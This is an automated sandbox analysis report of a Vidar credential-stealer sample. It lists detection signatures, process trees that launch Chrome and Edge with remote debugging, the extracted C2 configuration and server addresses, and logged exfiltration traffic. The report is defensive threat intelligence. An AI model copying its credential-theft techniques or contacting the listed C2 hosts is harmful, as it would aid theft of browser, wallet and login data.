Windows Analysis Report
gVKsiQIHqe.exe

Overview

General Information

Sample name: gVKsiQIHqe.exe (renamed because original name is a hash value)
Original sample name: 2e45d5934db7da8ff7b560a80ceb96ab.exe
Analysis ID: 1579643
MD5: 2e45d5934db7da8ff7b560a80ceb96ab
SHA1: e1d653b1a6acbacd6eb592041d21786ca3a633c8
SHA256: f2c2df5d625c6983881695ab53416c52aa574821e01074f607b6039e5d79e76f
Tags: exe, user-abuse_ch

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Monitors registry run keys for changes
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • gVKsiQIHqe.exe (PID: 5564 cmdline: "C:\Users\user\Desktop\gVKsiQIHqe.exe" MD5: 2E45D5934DB7DA8FF7B560A80CEB96AB)
    • chrome.exe (PID: 5884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 --field-trial-handle=2812,i,12872953387069903488,11110384550952122137,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • msedge.exe (PID: 7720 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7936 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2224,i,4927073609183200829,12100842426449448139,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 8004 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6520 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5948 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6444 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7760 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6504 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
gVKsiQIHqe.exe | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: gVKsiQIHqe.exe PID: 5564 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: gVKsiQIHqe.exe PID: 5564 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: gVKsiQIHqe.exe PID: 5564 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.gVKsiQIHqe.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.0.gVKsiQIHqe.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

                  System Summary

                  Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\gVKsiQIHqe.exe", ParentImage: C:\Users\user\Desktop\gVKsiQIHqe.exe, ParentProcessId: 5564, ParentProcessName: gVKsiQIHqe.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5884, ProcessName: chrome.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-12-23T06:57:27.806392+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 94.130.188.57 | 443 | 192.168.2.5 | 49708 | TCP
                  2024-12-23T06:57:30.110607+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 94.130.188.57 | 443 | 192.168.2.5 | 49709 | TCP
                  2024-12-23T06:57:27.806148+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 94.130.188.57 | 443 | TCP
                  2024-12-23T06:57:22.889027+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49706 | 94.130.188.57 | 443 | TCP

                  AV Detection

                  Source: gVKsiQIHqe.exe | Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                  Source: gVKsiQIHqe.exe | ReversingLabs: Detection: 71%
                  Source: gVKsiQIHqe.exe | Virustotal: Detection: 66%
                  Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
                  Source: gVKsiQIHqe.exe | Joe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004078F0 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA,0_2_004078F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004116B0 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,0_2_004116B0
                  Source: gVKsiQIHqe.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49916 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49762 version: TLS 1.2
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: chrome.exeMemory has grown: Private usage: 1MB later: 38MB

                  Networking

                  Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.57:443 -> 192.168.2.5:49709
                  Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49706 -> 94.130.188.57:443
                  Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49708 -> 94.130.188.57:443
                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.57:443 -> 192.168.2.5:49708
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                  Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                  Source: Joe Sandbox ViewIP Address: 18.164.116.39 18.164.116.39
                  Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49916 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.39
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00404280 InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00404280
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b2?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1B5aaed1ef292e4cd07b08d1734933482; XID=1B5aaed1ef292e4cd07b08d1734933482
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734933482036&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=0e7012095d61412c88f16ab8ae837c65&activityId=0e7012095d61412c88f16ab8ae837c65&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=63FAA190F2474AB080F91B05DE1E2DE2&MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; SM=T
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: 000003.log8.8.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                  Source: 000003.log8.8.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                  Source: 000003.log8.8.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: t.me
                  Source: global trafficDNS traffic detected: DNS query: toptek.sbs
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                  Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                  Source: global trafficDNS traffic detected: DNS query: c.msn.com
                  Source: global trafficDNS traffic detected: DNS query: api.msn.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----PHLFC2NGVAAIEUSR9RI5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                  Source: QuotaManager.8.drString found in binary or memory: https://ntp.msn.com/_default
                  Source: 2cc80dabc69f58b6_1.8.dr, 000003.log0.8.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                  Source: 000003.log0.8.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                  Source: Session_13379407070125135.8.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                  Source: QuotaManager.8.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                  Source: 2cc80dabc69f58b6_0.8.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://open.spotify.com
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.live.com/mail/0/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
